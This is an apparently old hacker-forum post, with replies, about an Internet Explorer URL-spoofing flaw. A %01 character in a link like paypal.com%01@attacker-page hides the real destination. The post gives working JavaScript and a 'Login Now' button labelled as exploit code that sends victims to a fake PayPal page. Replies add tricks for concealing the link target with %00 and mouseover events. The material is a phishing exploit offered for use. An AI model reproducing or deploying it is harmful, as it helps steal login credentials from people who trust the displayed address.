Submitted by Stoney


but if u send a link with a %01 in it ie doesnt put anything after the %01 in the address bar like
http://www.paypal.com%01@urwebpage.com/PayPal.html

im sending this to u because i cant post in the exploit section because im a new membor

Example:

<!-- exploit code -->

<script language="javascript">
function DestinationUrl() {
location.href=unescape('http://www.paypal.com%01@urpage.com.com/index.htm');
return (false);
}

</script>

<!-- end exploit code -->

<!-- exploit link -->

<input TYPE="button" VALUE=" Login Now" NAME="Destination" onClick="window.DestinationUrl()">
<!-- end exploit link -->

You only can see the original link - while loading - in the statusbar of IE.

It´s funny.

This issue has already appeared on the board two times before. Both times It was mentioned that doing a %00 before the %01 is better, and an even better way of doing it cause the "status bar" when you hover over the link indicates you are going to the spoofed site.

Here's a post with the full information from a while back:
http://www.governmentsecurity.org/forum/in...t=0&#entry40031

Oh, and Microsoft is addressing this issue very soon.

not if the links a button it doesnt show were its going and even if u wanted to use a link u could allways use a mouseover event to hide it and i think i remember reading microsoft isnt gona address the issue till the next services pack

Here is another link on the form regarding this.
http://www.governmentsecurity.org/forum/in...?showtopic=5878
Regards
~Faceless Master